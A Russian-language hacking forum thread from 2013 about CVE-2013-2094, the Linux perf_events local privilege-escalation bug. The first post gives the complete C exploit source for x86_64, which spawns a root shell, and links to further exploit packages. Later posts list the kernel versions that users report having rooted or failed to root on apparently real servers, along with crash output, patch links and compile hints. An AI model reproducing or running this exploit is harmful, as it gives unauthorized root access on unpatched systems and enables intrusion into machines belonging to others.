Старый 14.05.2013, 10:33   #1
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86_64 (и x86)

уязвим редхат с 2.6.32-131.0.15 (возможно, и ниже) до 2.6.32-358.6.1 (фиксед в 2.6.32-358.6.2)
и некоторые другие дистры с ядрами от 2.6.37 до 3.8.9 (3.8.10?)

В RHEL6 openvz пофиксено в 042stab076.8 (14 May 2013).

оригинал для x64_64 redhat-based
Код:
/*
 * linux 2.6.37-3.x.x x86_64, ~100 LOC
 * gcc-4.6 -O2 semtex.c && ./a.out
 * 2010 sd@fucksheep.org, salut!
 *
 * update may 2013:
 * seems like centos 2.6.32 backported the perf bug, lol.
 * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist.
 */

#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <stdint.h>
#include <assert.h>

#define BASE  0x380000000
#define SIZE  0x010000000
#define KSIZE  0x2000000
#define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337))))

void fuck() {
  int i,j,k;
  uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) };
  uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192));
  uint64_t kbase = ((uint64_t)current)>>36;
  uint32_t *fixptr = (void*) AB(1);
  *fixptr = -1;

  for (i=0; i<4000; i+=4) {
    uint64_t *p = (void *)&current[i];
    uint32_t *t = (void*) p[0];
    if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue;
    for (j=0; j<20; j++) { for (k = 0; k < 8; k++)
      if (((uint32_t*)uids)[k] != t[j+k]) goto next;
      for (i = 0; i < 8; i++) t[j+i] = 0;
      for (i = 0; i < 10; i++) t[j+9+i] = -1;
      return;
next:;    }
  }
}

void sheep(uint32_t off) {
  uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 };
  int fd = syscall(298, buf, 0, -1, -1, 0);
  assert(!close(fd));
}


int  main() {
  uint64_t  u,g,needle, kbase, *p; uint8_t *code;
  uint32_t *map, j = 5;
  int i;
  struct {
    uint16_t limit;
    uint64_t addr;
  } __attribute__((packed)) idt;
  assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE);
  memset(map, 0, SIZE);
  sheep(-1); sheep(-2);
  for (i = 0; i < SIZE/4; i++) if (map[i]) {
    assert(map[i+1]);
    break;
  }
  assert(i<SIZE/4);
  asm ("sidt %0" : "=m" (idt));
  kbase = idt.addr & 0xff000000;
  u = getuid(); g = getgid();
  assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase);
  memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024);
  memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf",
    printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27);
  setresuid(u,u,u); setresgid(g,g,g);
  while (j--) {
    needle = AB(j+1);
    assert(p = memmem(code, 1024, &needle, 8));
    if (!p) continue;
    *p = j?((g<<32)|u):(idt.addr + 0x48);
  }
  sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16);
  asm("int $0x4");  assert(!setuid(0));
  return execl("/bin/bash", "-sh", NULL);
}
UPDATE: версия для x86 https://rdot.org/forum/showpost.php?...6&postcount=46

UPDATE: добавлено в enlightenment от spender, версия для x86 и x86_64 http://grsecurity.net/~spender/explo...ightenment.tgz

UPDATE: enlightenment for x86 и x86_64 without backconnect rdot.org/forum/showpost.php?p=31974&postcount=51

Последний раз редактировалось 12309; 11.02.2014 в 00:34.. Причина: поправил нижнюю уязвимую версию
12309 вне форума   Ответить с цитированием
Старый 14.05.2013, 11:18   #2
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

патч https://patchwork.kernel.org/patch/2441281/

Цитата:
Tested on 2.6.32-220.7.1.el6.x86_64
Баг немного похож на недавний в archer.c (3.3 -- 3.8): также можем влиять на номер элемента массива, и когда он выходит за рамки, можно инкрементировать на единицу адрес памяти. Правда тут мы передаем отрицательное значение элемента массива.


sd крут

Последний раз редактировалось SynQ; 14.05.2013 в 11:38..
SynQ вне форума   Ответить с цитированием
Старый 14.05.2013, 11:56   #3
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

на 2.6.32-358.6.1.el6.x86_64 уже
Цитата:
sd@fucksheep.org 2010
linn: lin_new.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Aborted (core dumped)
snake вне форума   Ответить с цитированием
Старый 14.05.2013, 12:16   #4
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

snake
24 апреля вышла - через 11 дней после патча. Что интересно - никакого упоминания о баге
https://rhn.redhat.com/errata/RHSA-2013-0744.html
SynQ вне форума   Ответить с цитированием
Старый 14.05.2013, 12:21   #5
snake
 
Регистрация: 05.07.2010
Сообщений: 173
Репутация: 12
По умолчанию

+2.6.32-358.6.1.el6.x86_64 #1 SMP Tue Apr 23 19:29:00 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux ---все таки поруталось,напомню что это последнее оф.ядро на центос.
+2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13
+2.6.32-220.23.1.el6.x86_64 #1 SMP Mon Jun 18 18:58:52 BST 2012 x86_64 x86_64 x86_64
+2.6.38.6-core2quad #1 SMP Thu May 19 04:13:58 CEST 2011 x86_64 GNU/Linux ---Debian 5.0
+3.4.40-ih #1 SMP Sun Apr 14 12:59:47 CEST 2013 x86_64 ---gentoo
+2.6.32-131.21.1.el6.x86_64 #1 SMP Tue Nov 22 19:48:09 GMT 2011 x86_64 x86_64 x86_64
+2.6.32-042stab063.2#1 SMP Tue Oct 23 16:24:09 MSK 2012x86_64
+2.6.32-6-pve #1 SMP Fri Nov 4 06:54:05 CET 2011 x86_64 ---Debian 6.0
+3.2.12-gentoo #1 SMP Tue Mar 27 20:27:58 CEST 2012 x86_64 ---Gentoo
+2.6.32-131.17.1.el6.x86_64 #1 SMP Thu Oct 6 19:24:09 BST 2011 x86_64
=============================
-3.2.44-1 #1 SMP Thu May 2 13:27:08 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux (Centos6.4) ---процесс завис,но сервер живой(вроде бы=) ).
-2.6.32.45-grsec-2.2.2-r3 #8 SMP Mon Oct 10 13:33:17 PDT 2011 x86_64 GNU/Linux --Debian6.0
-3.2.44 #16 SMP Tue May 14 08:12:20 CDT 2013 x86_64 x86_64 x86_64 GNU/Linux --прям вчера суки обновились
-2.6.32-20130307.60.9.bh6.x86_64 #1 SMP Thu Mar 7 15:58:33 EST 2013 x86_64
-3.5.0-23-generic #35-Ubuntu SMP Thu Jan 24 13:15:40 UTC 2013 x86_6
-2.6.32-5-amd64 #1 SMP Mon Feb 25 00:26:11 UTC 2013 x86_64
-3.2.0-25-generic #40-Ubuntu SMP Wed May 23 20:30:51 UTC 2012 x86_64 ---Ubuntu 12.04.1 LTS ->killed
-2.6.43.8-1.fc15.x86_64 #1 SMP Mon Jun 4 20:33:44 UTC 2012 x86_64 --killed
-2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux
-2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 08:24:06 CET 2013 x86_64 x86_64 x86_64 GNU/Linux ---Scientific Linux CERN SLC release 6.4 (Carbon) Странно вобще
-3.4.0+ #12 SMP Thu May 24 03:41:20 MSK 2012 x86_64 x86_64 x86_64 --- Scientific Linux CERN SLC release 6.2 (Carbon)
не рутаются с такой ошибкой.
-3.0.18-x86_64-linode24 #1 SMP Mon Jan 30 14:25:46 EST 2012 x86_64 GNU/Linux >kernel:Oops

Цитата:
sheep: Assertion `!close(fd)' failed.
добавляю валид\невалид

Последний раз редактировалось snake; 18.05.2013 в 19:03.. Причина: add
snake вне форума   Ответить с цитированием
Старый 14.05.2013, 14:46   #6
elk
 
Регистрация: 07.03.2013
Сообщений: 19
Репутация: 1
По умолчанию

Код:
$ uname -a

Linux 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 UTC 2013 x86_64

$ ./pe

pe: PERF_EVENTS.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
2.6.37-3.x x86_64
sd@fucksheep.org 2010
Правда без бекконекта, но все же
elk вне форума   Ответить с цитированием
Старый 14.05.2013, 15:01   #7
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

snake
Как победил? Почему сначала не руталось?

PS 2.6.18 и i686 и не должны рутаться.
PPS Под x86 думаю можно портировать эксплойт.

Что интересно, баг было довольно заметен (впрочем постфактум ), функции идут друг за другом:
Код:
static void sw_perf_event_destroy(struct perf_event *event)
{
	u64 event_id = event->attr.config;

	WARN_ON(event->parent);

	jump_label_dec(&perf_swevent_enabled[event_id]);
	swevent_hlist_put(event);
}

static int perf_swevent_init(struct perf_event *event)
{
	int event_id = event->attr.config;
......

Последний раз редактировалось SynQ; 14.05.2013 в 15:19..
SynQ вне форума   Ответить с цитированием
Старый 14.05.2013, 15:35   #8
12309
 
Регистрация: 25.12.2011
Сообщений: 265
Репутация: 33
По умолчанию

а с какой версии (в редхатовской интерпретации 2.6.32-х) ядро уязвимо?
12309 вне форума   Ответить с цитированием
Старый 14.05.2013, 15:45   #9
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

12309
Надо исходники смотреть, в RHEL kernel 2.6.32-220.el6 точно есть (ну и выше подтверждения):
https://oss.oracle.com/git/?p=redpat...a7da61;hb=HEAD
SynQ вне форума   Ответить с цитированием
Старый 14.05.2013, 15:52   #10
oRb
 
Аватар для oRb
 
Регистрация: 01.07.2010
Сообщений: 319
Репутация: 138
По умолчанию

Цитата:
Сообщение от SynQ Посмотреть сообщение
snake
Как победил? Почему сначала не руталось?
Рискну предположить, что он компилил без ключа -O2.
__________________
Не оказываю никаких услуг.
I don't provide any services.
oRb вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot